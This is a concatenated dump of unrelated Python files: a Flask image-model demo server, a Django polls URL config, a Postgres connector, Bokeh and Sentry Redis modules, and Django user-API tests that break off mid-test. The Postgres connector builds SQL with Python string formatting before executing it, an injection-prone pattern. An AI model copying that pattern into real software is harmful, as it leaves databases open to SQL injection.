def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
error_dict = dict(self.payload or ())
error_dict['message'] = self.message
return error_dict
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
UPLOAD_FOLDER = '/home/sethah/ssd/tmp/'
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
def make_app(predictor: Predictor,
field_names: List[str] = None,
static_dir: str = None,
task: str = None,
sanitizer: Callable[[JsonDict], JsonDict] = None,
title: str = "AllenNLP Demo") -> Flask:
"""
Creates a Flask app that serves up the provided ``Predictor``
along with a front-end for interacting with it.
If you want to use the built-in bare-bones HTML, you must provide the
field names for the inputs (which will be used both as labels
and as the keys in the JSON that gets sent to the predictor).
If you would rather create your own HTML, call it index.html
and provide its directory as ``static_dir``. In that case you
don't need to supply the field names -- that information should
be implicit in your demo site. (Probably the easiest thing to do
is just start with the bare-bones HTML and modify it.)
    In addition, if you want to somehow transform the JSON prediction
(e.g. by removing probabilities or logits)
you can do that by passing in a ``sanitizer`` function.
"""
if static_dir is not None:
static_dir = os.path.abspath(static_dir)
if not os.path.exists(static_dir):
logger.error("app directory %s does not exist, aborting", static_dir)
sys.exit(-1)
elif static_dir is None:
print("Neither build_dir nor field_names passed. Demo won't render on this port.\n"
"You must use nodejs + react app to interact with the server.")
app = Flask(__name__) # pylint: disable=invalid-name
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.errorhandler(ServerError)
def handle_invalid_usage(error: ServerError) -> Response: # pylint: disable=unused-variable
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route('/')
def index() -> Response: # pylint: disable=unused-variable
if static_dir is not None:
return send_file(os.path.join(static_dir, 'index.html'))
else:
html = _html(title, field_names, task)
return Response(response=html, status=200)
@app.route('/predict_batch', methods=['POST', 'OPTIONS'])
def predict_batch() -> Response: # pylint: disable=unused-variable
"""make a prediction using the specified model and return the results"""
if request.method == "OPTIONS":
return Response(response="", status=200)
data = request.get_json()
prediction = predictor.predict_batch_json(data)
if sanitizer is not None:
prediction = [sanitizer(p) for p in prediction]
return jsonify(prediction)
@app.route('/<path:path>')
def static_proxy(path: str) -> Response: # pylint: disable=unused-variable
if static_dir is not None:
return send_from_directory(static_dir, path)
else:
raise ServerError("static_dir not specified", 404)
@app.route('/predict', methods=['POST', 'OPTIONS'])
def predict() -> Response: # pylint: disable=unused-variable
data = request.data
        # Strip the leading data-URL prefix (assumed to be "data:image/jpeg;base64,",
        # 23 characters) before decoding the image bytes.
        decoded = base64.b64decode(data[23:])
stream = io.BytesIO(decoded)
img = Image.open(stream)
img = np.array(img).astype(np.uint8)
prediction = predictor.predict_json({'image': [int(x) for x in img.ravel().tolist()],
'image_shape': img.shape})
# print(prediction['boxes'])
return jsonify(prediction)
# prediction = predictor.predict_json(data)
# if sanitizer is not None:
# prediction = sanitizer(prediction)
#
# log_blob = {"inputs": data, "outputs": prediction}
# logger.info("prediction: %s", json.dumps(log_blob))
return app
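# Illustrative sketch (not part of the original file): make_app can also be driven
# programmatically once a Predictor has been constructed, e.g.
#
#   app = make_app(predictor=my_predictor, task='detection', title='My Demo')
#   app.run(port=8000)
#
# where `my_predictor` is any loaded AllenNLP Predictor (see _get_predictor below).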
def _get_predictor(args: argparse.Namespace) -> Predictor:
check_for_gpu(args.cuda_device)
archive = load_archive(args.archive_path,
weights_file=args.weights_file,
cuda_device=args.cuda_device,
overrides=args.overrides)
return Predictor.from_archive(archive, args.predictor)
def main(args):
# Executing this file with no extra options runs the simple service with the bidaf test fixture
# and the machine-comprehension predictor. There's no good reason you'd want
    # to do this, except possibly to test changes to the stock HTML.
parser = argparse.ArgumentParser(description='Serve up a simple model')
parser.add_argument('--archive-path', type=str, required=True, help='path to trained archive file')
parser.add_argument('--predictor', type=str, required=True, help='name of predictor')
parser.add_argument('--weights-file', type=str,
help='a path that overrides which weights file to use')
parser.add_argument('--cuda-device', type=int, default=-1, help='id of GPU to use (if any)')
parser.add_argument('-o', '--overrides', type=str, default="",
help='a JSON structure used to override the experiment configuration')
parser.add_argument('--static-dir', type=str, help='serve index.html from this directory')
parser.add_argument('--title', type=str, help='change the default page title', default="AllenNLP Demo")
parser.add_argument('--field-name', type=str, action='append',
help='field names to include in the demo')
parser.add_argument('--port', type=int, default=8000, help='port to serve the demo on')
parser.add_argument('--classification', action='store_true')
parser.add_argument('--detection', action='store_true')
parser.add_argument('--include-package',
type=str,
action='append',
default=[],
help='additional packages to include')
args = parser.parse_args(args)
# Load modules
for package_name in args.include_package:
import_submodules(package_name)
predictor = _get_predictor(args)
field_names = args.field_name
task = None
if args.classification:
task = 'classification'
if args.detection:
task = 'detection'
app = make_app(predictor=predictor,
field_names=field_names,
static_dir=args.static_dir,
task=task,
title=args.title)
CORS(app)
http_server = WSGIServer(('0.0.0.0', args.port), app)
print(f"Model loaded, serving demo on port {args.port}")
http_server.serve_forever()
#
# HTML and Templates for the default bare-bones app are below
#
_CLASSIFIER_PREDICTION_PROCESSING = """
function processPrediction(prediction) {
var i;
var canvas = document.getElementById("outputCanvas");
var ctx = canvas.getContext("2d");
ctx.font = "16px Arial";
var width = ctx.measureText(prediction['class']).width;
ctx.fillStyle="red";
ctx.fillRect(0, 0, width + 10, 20);
ctx.fillStyle = "white";
ctx.fillText(prediction['class'], 5, 15);
}
"""
_DUMMY_PREDICTION_PROCESSING = """
function processPrediction(prediction) {
};
"""
_BOX_PREDICTION_PROCESSING = """
function processPrediction(prediction) {
var i;
var canvas = document.getElementById("outputCanvas");
var ctx = canvas.getContext("2d");
console.log(prediction);
for (i = 0; i < prediction['box_proposals'].length; i++) {
var box = prediction['box_proposals'][i].map(function (x) {
return parseInt(x, 10);
});
ctx.beginPath();
ctx.lineWidth = "6";
ctx.strokeStyle = "red";
ctx.rect(box[0], box[1], box[2] - box[0], box[3] - box[1]);
console.log(box[0], box[1], box[2] - box[0], box[3] - box[1]);
ctx.stroke();
//if ('class' in prediction) {
// ctx.font = "16px Arial";
// var width = ctx.measureText(prediction['class'][i]).width;
// ctx.fillStyle="red";
// ctx.fillRect(box[0], box[1] - 20, width, 20);
// ctx.fillStyle = "white";
// ctx.fillText(prediction['class'][i], box[0], box[1]);
//}
}
};
"""
_PAGE_TEMPLATE = Template("""
<html>
<head>
<title>
$title
</title>
<style>
$css
</style>
</head>
<body>
<div class="pane-container">
<div class="pane model">
<div class="pane__left model__input">
<div class="model__content">
<h2><span>$title</span></h2>
<div class="model__content">
<input type="file" class="inputfile" id="file" name="file" onchange="previewFile()"><br>
<label for="file" class="custom-file-upload">Choose a file</label>
</div>
</div>
</div>
<div class="pane__right model__output model__output--empty">
<div class="pane__thumb"></div>
<div class="model__content">
<div id="output" class="output">
<div class="placeholder">
<div class="placeholder__content">
<canvas id="outputCanvas" width="512" height="512" style="border:1px solid #d3d3d3;">
</canvas>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
<script>
$process_prediction
function previewFile(){
//var preview = document.querySelector('img'); //selects the query named img
var file = document.querySelector('input[type=file]').files[0]; //sames as here
var reader = new FileReader();
reader.onloadend = function () {
var c = document.getElementById("outputCanvas");
var ctx = c.getContext("2d");
ctx.clearRect(0, 0, c.width, c.height);
var base_image = new Image();
base_image.src = reader.result;
base_image.onload = function(){
ctx.drawImage(base_image, 0, 0, 512, 512);
};
console.log(typeof(reader.result));
//console.log(reader.result);
var xhr = new XMLHttpRequest();
xhr.open('POST', '/predict');
//xhr.responseType = 'blob';
xhr.setRequestHeader('Content-Type', 'image/jpeg');
xhr.onload = function() {
var prediction = JSON.parse(xhr.responseText)
processPrediction(prediction);
};
xhr.send(reader.result);
}
if (file) {
reader.readAsDataURL(file); //reads the data as a URL
} else {
//preview.src = "";
}
};
previewFile();
</script>
</html>
""")
_SINGLE_INPUT_TEMPLATE = Template("""
<div class="form__field">
<label for="input-$field_name">$field_name</label>
<input type="text" id="input-$field_name" type="text" required value placeholder="input goes here">
</div>
""")
_CSS = """
body,
html {
min-width: 48em;
background: #f9fafc;
font-size: 16px
}
* {
font-family: sans-serif;
color: #232323
}
input[type="file"] {
display: none;
}
.custom-file-upload {
border: 1px solid #ccc;
display: inline-block;
padding: 6px 12px;
cursor: pointer;
}
section {
background: #fff
}
code,
code span,
pre,
.output {
font-family: 'Roboto Mono', monospace!important
}
code {
background: #f6f8fa
}
li,
p,
td,
th {
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
font-size: 1.125em;
line-height: 1.5em;
margin: 1.2em 0
}
pre {
margin: 2em 0
}
h1,
h2 {
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
font-weight: 300
}
h2 {
font-size: 2em;
color: rgba(35, 35, 35, .75)
}
img {
max-width: 100%
}
hr {
display: block;
border: none;
height: .375em;
background: #f6f8fa
}
blockquote,
hr {
margin: 2.4em 0
}
.btn {
text-decoration: none;
cursor: pointer;
text-transform: uppercase;
font-size: 1em;
margin: 0;
-moz-appearance: none;
-webkit-appearance: none;
border: none;
color: #fff!important;
display: block;
background: #2085bc;
padding: .9375em 3.625em;
-webkit-transition: background-color .2s ease, opacity .2s ease;
transition: background-color .2s ease, opacity .2s ease
}
.btn.btn--blue {
background: #2085bc
}
.btn:focus,
.btn:hover {
background: #40affd;
outline: 0
}
.btn:focus {
box-shadow: 0 0 1.25em rgba(50, 50, 150, .05)
}
.btn:active {
opacity: .66;
background: #2085bc;
-webkit-transition-duration: 0s;
transition-duration: 0s
}
.btn:disabled,
.btn:disabled:active,
.btn:disabled:hover {
cursor: default;
background: #d0dae3
}
form {
display: block
}
.form__field {
-webkit-transition: margin .2s ease;
transition: margin .2s ease
}
.form__field+.form__field {
margin-top: 2.5em
}
.form__field label {
display: block;
font-weight: 600;
font-size: 1.125em
}
.form__field label+* {
margin-top: 1.25em
}
.form__field input[type=text],
.form__field textarea {
-moz-appearance: none;
-webkit-appearance: none;
width: 100%;
font-size: 1em;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
padding: .8125em 1.125em;
color: #232323;
border: .125em solid #d4dce2;
display: block;
box-sizing: border-box;
-webkit-transition: background-color .2s ease, color .2s ease, border-color .2s ease, opacity .2s ease;
transition: background-color .2s ease, color .2s ease, border-color .2s ease, opacity .2s ease
}
.form__field input[type=text]::-webkit-input-placeholder,
.form__field textarea::-webkit-input-placeholder {
color: #b4b4b4
}
.form__field input[type=text]:-moz-placeholder,
.form__field textarea:-moz-placeholder {
color: #b4b4b4
}
.form__field input[type=text]::-moz-placeholder,
.form__field textarea::-moz-placeholder {
color: #b4b4b4
}
.form__field input[type=text]:-ms-input-placeholder,
.form__field textarea:-ms-input-placeholder {
color: #b4b4b4
}
.form__field input[type=text]:focus,
.form__field textarea:focus {
outline: 0;
border-color: #63a7d4;
box-shadow: 0 0 1.25em rgba(50, 50, 150, .05)
}
.form__field textarea {
resize: vertical;
min-height: 8.25em
}
.form__field .btn {
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
-webkit-touch-callout: none
}
.form__field--btn {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: row;
-ms-flex-direction: row;
-webkit-box-orient: horizontal;
-webkit-box-direction: normal;
flex-direction: row;
-webkit-justify-content: flex-end;
-ms-justify-content: flex-end;
-webkit-box-pack: end;
-ms-flex-pack: end;
justify-content: flex-end
}
@media screen and (max-height:760px) {
.form__instructions {
margin: 1.875em 0 1.125em
}
.form__field:not(.form__field--btn)+.form__field:not(.form__field--btn) {
margin-top: 1.25em
}
}
body,
html {
width: 100%;
height: 100%;
margin: 0;
padding: 0;
font-family: 'Source Sans Pro', sans-serif
}
h1 {
font-weight: 300
}
.model__output {
background: #fff
}
.model__output.model__output--empty {
background: 0 0
}
.placeholder {
width: 100%;
height: 100%;
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-align-items: center;
-ms-flex-align: center;
-webkit-box-align: center;
align-items: center;
-webkit-justify-content: center;
-ms-justify-content: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
-webkit-touch-callout: none;
cursor: default
}
.placeholder .placeholder__content {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: column;
-ms-flex-direction: column;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
flex-direction: column;
-webkit-align-items: center;
-ms-flex-align: center;
-webkit-box-align: center;
align-items: center;
text-align: center
}
.placeholder svg {
display: block
}
.placeholder svg.placeholder__empty,
.placeholder svg.placeholder__error {
width: 6em;
height: 3.625em;
fill: #e1e5ea;
margin-bottom: 2em
}
.placeholder svg.placeholder__error {
width: 4.4375em;
height: 4em
}
.placeholder p {
font-size: 1em;
margin: 0;
padding: 0;
color: #9aa8b2
}
.placeholder svg.placeholder__working {
width: 3.4375em;
height: 3.4375em;
-webkit-animation: working 1s infinite linear;
animation: working 1s infinite linear
}
@-webkit-keyframes working {
0% {
-webkit-transform: rotate(0deg)
}
100% {
-webkit-transform: rotate(360deg)
}
}
@keyframes working {
0% {
-webkit-transform: rotate(0deg);
-ms-transform: rotate(0deg);
transform: rotate(0deg)
}
100% {
-webkit-transform: rotate(360deg);
-ms-transform: rotate(360deg);
transform: rotate(360deg)
}
}
.model__content {
padding: 1.875em 2.5em;
margin: auto;
-webkit-transition: padding .2s ease;
transition: padding .2s ease
}
.model__content:not(.model__content--srl-output) {
max-width: 61.25em
}
.model__content h2 {
margin: 0;
padding: 0;
font-size: 1em
}
.model__content h2 span {
font-size: 2em;
color: rgba(35, 35, 35, .75)
}
.model__content h2 .tooltip,
.model__content h2 span {
vertical-align: top
}
.model__content h2 span+.tooltip {
margin-left: .4375em
}
.model__content>h2:first-child {
margin: -.25em 0 0 -.03125em
}
.model__content__summary {
font-size: 1em;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
padding: 1.25em;
background: #f6f8fa
}
@media screen and (min-height:800px) {
.model__content {
padding-top: 4.6vh;
padding-bottom: 4.6vh
}
}
.pane-container {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: column;
-ms-flex-direction: column;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
flex-direction: column;
height: 100%
}
.pane {
display: -webkit-box;
display: -ms-flexbox;
display: -webkit-flex;
display: flex;
-webkit-flex-direction: row;
-ms-flex-direction: row;
-webkit-box-orient: horizontal;
-webkit-box-direction: normal;
flex-direction: row;
position: relative;
-webkit-box-flex: 2;
-webkit-flex: 2;
-ms-flex: 2;
flex: 2;
height: auto;
min-height: 100%;
min-height: 34.375em
}
.pane__left,
.pane__right {
width: 100%;
height: 100%;
-webkit-align-self: stretch;
-ms-flex-item-align: stretch;
align-self: stretch;
min-width: 24em;
min-height: 34.375em
}
.pane__left {
height: auto;
min-height: 100%
}
.pane__right {
width: 100%;
overflow: auto;
height: auto;
min-height: 100%
}
.pane__right .model__content.model__content--srl-output {
display: inline-block;
margin: auto
}
.pane__thumb {
height: auto;
min-height: 100%;
margin-left: -.625em;
position: absolute;
width: 1.25em
}
.pane__thumb:after {
display: block;
position: absolute;
height: 100%;
top: 0;
content: "";
width: .25em;
background: #e1e5ea;
left: .5em
}
"""
def _html(title: str, field_names: List[str], task: str) -> str:
"""
Returns bare bones HTML for serving up an input form with the
specified fields that can render predictions from the configured model.
"""
# inputs = ''.join(_SINGLE_INPUT_TEMPLATE.substitute(field_name=field_name)
# for field_name in field_names)
inputs = ""
# quoted_field_names = [f"'{field_name}'" for field_name in field_names]
# quoted_field_list = f"[{','.join(quoted_field_names)}]"
if task == 'classification':
process_fun = _CLASSIFIER_PREDICTION_PROCESSING
elif task == 'detection':
process_fun = _BOX_PREDICTION_PROCESSING
else:
process_fun = _DUMMY_PREDICTION_PROCESSING
return _PAGE_TEMPLATE.substitute(title=title,
css=_CSS,
inputs=inputs,
qfl="",
process_prediction=process_fun)
if __name__ == "__main__":
main(sys.argv[1:])
|
py
|
1a5ee51a8711ffafd4c508e6104b133155743418
|
from django.urls import path
from . import views
app_name = 'polls'
urlpatterns = [
    path('', views.IndexView.as_view(), name="index"),
path('<int:pk>/', views.DetailView.as_view(), name="detail"),
path('<int:pk>/results/', views.ResultsView.as_view(), name="results"),
path('<int:question_id>/vote/', views.vote, name="vote"),
]
|
py
|
1a5ee5232a38b58c0a63a73c93c694e9c626b403
|
import psycopg2
import psycopg2.extras
from Infrastructure import log
logger = log.get_logger("Postgres")
class Connector:
def __init__(self, config):
self.host = config['hostname']
self.database = config['database']
self.user = config['username']
self.password = config['password']
self.connection = None
def connect(self):
i = 1
while not self.connection:
try:
self.connection = psycopg2.connect(host=self.host,
database=self.database,
user=self.user,
password=self.password)
except Exception as e:
i += 1
logger.info("Error postgres connection " + str(e))
logger.info("Connect postgres " + str(i))
if i > 10:
break
    def execute_with_results(self, query, params=None, as_dict=False):
        params = params or {}
        query = query.format(**params)
self.connect()
if as_dict:
cursor = self.connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
else:
cursor = self.connection.cursor()
cursor.execute(query)
data = cursor.fetchall()
self.connection.commit()
cursor.close()
self.close()
if as_dict:
data = list(map(lambda r: dict(r), data))
return data
def execute_with_results_generic(self, query):
self.connect()
cursor = self.connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cursor.execute(query)
rowcount = cursor.rowcount
try:
data = list(cursor.fetchall())
except Exception as ex:
data = []
self.connection.commit()
cursor.close()
return [data, rowcount]
    def execute_multiple_queries_select_dict_response(self, store_procedure, params=None):
        params = params or {}
        with open(store_procedure, 'r') as procedure_file:
            procedure = procedure_file.read()
        sql_command = procedure.format(**params)
sqllist = sql_command.split(";")[:-1]
selects = []
for sql_c in sqllist:
selected = self.execute_with_results_generic(sql_c)
selects.append(selected)
return selects
def close(self):
if self.connection:
self.connection.close()
self.connection = None
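# A minimal usage sketch (not part of the original module); the connection
# settings below are hypothetical placeholders for a local Postgres instance.
if __name__ == "__main__":
    demo_config = {
        "hostname": "localhost",
        "database": "mydb",
        "username": "user",
        "password": "secret",
    }
    connector = Connector(demo_config)
    rows = connector.execute_with_results(
        "SELECT table_name FROM information_schema.tables LIMIT {limit}",
        params={"limit": 5},
        as_dict=True,
    )
    for row in rows:
        print(row)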
|
py
|
1a5ee584f524f784537884872eec139b04ddc092
|
# Copyright 2012 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from whoosh.matching.mcore import *
from whoosh.matching.binary import *
from whoosh.matching.wrappers import *
from whoosh.matching.combo import *
|
py
|
1a5ee62cf233030681ba27b60b7cbd8785979bd2
|
import pandas as pd
from bokeh.io import output_file, show
from bokeh.models import (BasicTicker, ColorBar, ColumnDataSource,
LinearColorMapper, PrintfTickFormatter,)
from bokeh.plotting import figure
from bokeh.sampledata.unemployment1948 import data
from bokeh.transform import transform
output_file("unemploymemt.html")
data.Year = data.Year.astype(str)
data = data.set_index('Year')
data.drop('Annual', axis=1, inplace=True)
data.columns.name = 'Month'
# reshape to 1D array of rates with a month and year for each row.
df = pd.DataFrame(data.stack(), columns=['rate']).reset_index()
source = ColumnDataSource(df)
# this is the colormap from the original NYTimes plot
colors = ["#75968f", "#a5bab7", "#c9d9d3", "#e2e2e2", "#dfccce", "#ddb7b1", "#cc7878", "#933b41", "#550b1d"]
mapper = LinearColorMapper(palette=colors, low=df.rate.min(), high=df.rate.max())
p = figure(plot_width=800, plot_height=300, title="US unemployment 1948—2016",
x_range=list(data.index), y_range=list(reversed(data.columns)),
toolbar_location=None, tools="", x_axis_location="above")
p.rect(x="Year", y="Month", width=1, height=1, source=source,
line_color=None, fill_color=transform('rate', mapper))
color_bar = ColorBar(color_mapper=mapper, location=(0, 0),
ticker=BasicTicker(desired_num_ticks=len(colors)),
formatter=PrintfTickFormatter(format="%d%%"))
p.add_layout(color_bar, 'right')
p.axis.axis_line_color = None
p.axis.major_tick_line_color = None
p.axis.major_label_text_font_size = "7px"
p.axis.major_label_standoff = 0
p.xaxis.major_label_orientation = 1.0
show(p)
|
py
|
1a5ee786c90e434502371e64e848b5c631b11927
|
from __future__ import absolute_import
import functools
import logging
import posixpath
import six
from threading import Lock
import rb
from django.utils.functional import SimpleLazyObject
from pkg_resources import resource_string
from redis.client import Script, StrictRedis
from redis.connection import ConnectionPool
from redis.exceptions import ConnectionError, BusyLoadingError
from rediscluster import StrictRedisCluster
from sentry import options
from sentry.exceptions import InvalidConfiguration
from sentry.utils import warnings
from sentry.utils.warnings import DeprecatedSettingWarning
from sentry.utils.versioning import Version, check_versions
from sentry.utils.compat import map
logger = logging.getLogger(__name__)
_pool_cache = {}
_pool_lock = Lock()
def _shared_pool(**opts):
if "host" in opts:
key = "%s:%s/%s" % (opts["host"], opts["port"], opts["db"])
else:
key = "%s/%s" % (opts["path"], opts["db"])
pool = _pool_cache.get(key)
if pool is not None:
return pool
with _pool_lock:
pool = _pool_cache.get(key)
if pool is not None:
return pool
pool = ConnectionPool(**opts)
_pool_cache[key] = pool
return pool
_make_rb_cluster = functools.partial(rb.Cluster, pool_cls=_shared_pool)
def make_rb_cluster(*args, **kwargs):
# This uses the standard library `warnings`, since this is provided for
# plugin compatibility but isn't actionable by the system administrator.
import warnings
warnings.warn(
"Direct Redis cluster construction is deprecated, please use named clusters. "
"Direct cluster construction will be removed in Sentry 8.5.",
DeprecationWarning,
)
return _make_rb_cluster(*args, **kwargs)
class _RBCluster(object):
def supports(self, config):
return not config.get("is_redis_cluster", False)
def factory(self, **config):
# rb expects a dict of { host, port } dicts where the key is the host
# ID. Coerce the configuration into the correct format if necessary.
hosts = config["hosts"]
hosts = {k: v for k, v in enumerate(hosts)} if isinstance(hosts, list) else hosts
config["hosts"] = hosts
return _make_rb_cluster(**config)
def __str__(self):
return "Redis Blaster Cluster"
class RetryingStrictRedisCluster(StrictRedisCluster):
"""
Execute a command with cluster reinitialization retry logic.
Should a cluster respond with a ConnectionError or BusyLoadingError the
cluster nodes list will be reinitialized and the command will be executed
again with the most up to date view of the world.
"""
def execute_command(self, *args, **kwargs):
try:
return super(self.__class__, self).execute_command(*args, **kwargs)
except (
ConnectionError,
BusyLoadingError,
KeyError, # see: https://github.com/Grokzen/redis-py-cluster/issues/287
):
self.connection_pool.nodes.reset()
return super(self.__class__, self).execute_command(*args, **kwargs)
class _RedisCluster(object):
def supports(self, config):
# _RedisCluster supports two configurations:
# * Explicitly configured with is_redis_cluster. This mode is for real redis-cluster.
# * No is_redis_cluster, but only 1 host. This represents a singular node Redis running
# in non-cluster mode.
return config.get("is_redis_cluster", False) or len(config.get("hosts")) == 1
def factory(self, **config):
# StrictRedisCluster expects a list of { host, port } dicts. Coerce the
# configuration into the correct format if necessary.
hosts = config.get("hosts")
# TODO(joshuarli): modernize dict_six fixer
hosts = list(hosts.values()) if isinstance(hosts, dict) else hosts
# Redis cluster does not wait to attempt to connect. We'd prefer to not
# make TCP connections on boot. Wrap the client in a lazy proxy object.
def cluster_factory():
if config.get("is_redis_cluster", False):
return RetryingStrictRedisCluster(
startup_nodes=hosts,
decode_responses=True,
skip_full_coverage_check=True,
max_connections=16,
max_connections_per_node=True,
)
else:
host = hosts[0].copy()
host["decode_responses"] = True
return StrictRedis(**host)
return SimpleLazyObject(cluster_factory)
def __str__(self):
return "Redis Cluster"
class ClusterManager(object):
def __init__(self, options_manager, cluster_type=_RBCluster):
self.__clusters = {}
self.__options_manager = options_manager
self.__cluster_type = cluster_type()
def get(self, key):
cluster = self.__clusters.get(key)
if cluster:
return cluster
# TODO: This would probably be safer with a lock, but I'm not sure
# that it's necessary.
configuration = self.__options_manager.get("redis.clusters").get(key)
if configuration is None:
raise KeyError(u"Invalid cluster name: {}".format(key))
if not self.__cluster_type.supports(configuration):
raise KeyError(u"Invalid cluster type, expected: {}".format(self.__cluster_type))
cluster = self.__clusters[key] = self.__cluster_type.factory(**configuration)
return cluster
# TODO(epurkhiser): When migration of all rb cluster to true redis clusters has
# completed, remove the rb ``clusters`` module variable and rename
# redis_clusters to clusters.
clusters = ClusterManager(options.default_manager)
redis_clusters = ClusterManager(options.default_manager, _RedisCluster)
def get_cluster_from_options(setting, options, cluster_manager=clusters):
cluster_option_name = "cluster"
default_cluster_name = "default"
cluster_constructor_option_names = frozenset(("hosts",))
options = options.copy()
cluster_options = {
key: options.pop(key)
for key in set(options.keys()).intersection(cluster_constructor_option_names)
}
if cluster_options:
if cluster_option_name in options:
raise InvalidConfiguration(
u"Cannot provide both named cluster ({!r}) and cluster configuration ({}) options.".format(
cluster_option_name, ", ".join(map(repr, cluster_constructor_option_names))
)
)
else:
warnings.warn(
DeprecatedSettingWarning(
u"{} parameter of {}".format(
", ".join(map(repr, cluster_constructor_option_names)), setting
),
u'{}["{}"]'.format(setting, cluster_option_name),
removed_in_version="8.5",
),
stacklevel=2,
)
cluster = rb.Cluster(pool_cls=_shared_pool, **cluster_options)
else:
cluster = cluster_manager.get(options.pop(cluster_option_name, default_cluster_name))
return cluster, options
def get_dynamic_cluster_from_options(setting, config):
cluster_name = config.get("cluster", "default")
cluster_opts = options.default_manager.get("redis.clusters").get(cluster_name)
if cluster_opts is not None and cluster_opts.get("is_redis_cluster"):
# RedisCluster
return True, redis_clusters.get(cluster_name), config
# RBCluster
return (False,) + get_cluster_from_options(setting, config)
def validate_dynamic_cluster(is_redis_cluster, cluster):
try:
if is_redis_cluster:
cluster.ping()
else:
with cluster.all() as client:
client.ping()
except Exception as e:
raise InvalidConfiguration(six.text_type(e))
def check_cluster_versions(cluster, required, recommended=None, label=None):
try:
with cluster.all() as client:
results = client.info()
except Exception as e:
# Any connection issues should be caught here.
raise InvalidConfiguration(six.text_type(e))
versions = {}
for id, info in results.value.items():
host = cluster.hosts[id]
# NOTE: This assumes there is no routing magic going on here, and
# all requests to this host are being served by the same database.
key = u"{host}:{port}".format(host=host.host, port=host.port)
versions[key] = Version(map(int, info["redis_version"].split(".", 3)))
check_versions(
"Redis" if label is None else "Redis (%s)" % (label,), versions, required, recommended
)
def load_script(path):
script = Script(None, resource_string("sentry", posixpath.join("scripts", path)))
# This changes the argument order of the ``Script.__call__`` method to
# encourage using the script with a specific Redis client, rather
# than implicitly using the first client that the script was registered
# with. (This can prevent lots of bizarre behavior when dealing with
# clusters of Redis servers.)
def call_script(client, keys, args):
u"""
Executes {!r} as a Lua script on a Redis server.
Takes the client to execute the script on as the first argument,
followed by the values that will be provided as ``KEYS`` and ``ARGV``
to the script as two sequence arguments.
""".format(
path
)
return script(keys, args, client)
return call_script
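# Illustrative sketch (not part of the original module): invoking a loaded Lua
# script against an explicit client. The script path and key name below are
# hypothetical and assume a file shipped under sentry/scripts/.
#
#   increment = load_script("example.lua")
#   result = increment(StrictRedis(), ["counter-key"], [1])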
|
py
|
1a5ee7a39b3f8b46bf09ab68705d9d03a767ec46
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
"""Helper function to create new user"""
return get_user_model().objects.create_user(**params)
class PublicUserApiTests(TestCase):
"""Test the users API (public)"""
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
"""Test creating using with a valid payload is successful"""
payload = {
'email': '[email protected]',
'password': 'testpass',
'name': 'name',
}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(
user.check_password(payload['password'])
)
self.assertNotIn('password', res.data)
def test_user_exists(self):
"""Test creating a user that already exists fails"""
payload = {'email': '[email protected]', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""Test that password must be more than 5 characters"""
payload = {'email': '[email protected]', 'password': 'pw'}
res = self.client.post(CREATE_USER_URL, payload)
